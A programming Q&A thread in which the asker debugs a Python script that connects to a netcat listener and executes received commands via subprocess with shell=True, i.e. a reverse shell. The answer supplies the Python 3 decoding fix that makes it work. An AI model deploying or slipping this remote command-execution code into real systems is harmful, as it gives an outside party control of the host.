# Python shell script error with Popen

Tags: python, sockets, shell, version, subprocess

My shell script:

```
#!/usr/bin/python

import subprocess, socket

HOST = 'localhost'
PORT = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))


while 1:
    data = s.recv(1024)
    if data == "quit": break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,     stderr=subprocess.PIPE, stdin=subprocess.PIPE)


    stdoutput = proc.stdout.read() + proc.stderr.read()

    s.send(stdoutput)


s.close()
```

I am using netcat to listen on port 4444. So i run `netcat` and it is listening. Then I run this script, but if I type `ipconfig` or something in `netcat` I get this error in shell:

```
Traceback (most recent call last):
  File "C:\Users\Myname\Documents\shell.py", line 16, in <module>
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  File "C:\Python33\lib\subprocess.py", line 818, in __init__
    restore_signals, start_new_session)
  File "C:\Python33\lib\subprocess.py", line 1049, in _execute_child
    args = list2cmdline(args)
  File "C:\Python33\lib\subprocess.py", line 627, in list2cmdline
    needquote = (" " in arg) or ("\t" in arg) or not arg
TypeError: argument of type 'int' is not iterable
```

Comment: [`socket.recv()`](http://docs.python.org/3.3/library/socket.html#socket.socket.recv) returns a [`bytes`](http://docs.python.org/3.1/library/functions.html#bytes) object. Maybe it's not a string type? Does `data = str(s.recv(1024))` work? (I've never worked with `bytes` objects...)

Comment: I tested your code, I didn't get any error messages. Maybe try to change the port number(4444 is registered port), and write the actual IP instead of the `localhost` (tested on Xubuntu and Windows 8 with Python 2.7.3)

Answer (score 1):

Your code works perfect with Python 2.7. But it will lead to the shown error with Python3. Because in Python 2.X, the return value of data = s.recv(1024) is a string, while in Python 3.X it is bytes. You should decode it before execute it with subprocess.Popen(), as following:

```
#!/usr/bin/python

import subprocess, socket

HOST = 'localhost'
PORT = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

while True:
    data = s.recv(1024).decode()
    if data == "quit\n": break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,     stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)

s.close()
```

When decoding the bytes, it depends on the coding set, if it is not ASCII.

Two suggestions:

1. In the infinite loop, we'd better to use while True instead of while 1 to enhance the readability.
2. The recieved string would be end with "\n" if you are using netcat to send commands. So data == "quit" will always be false.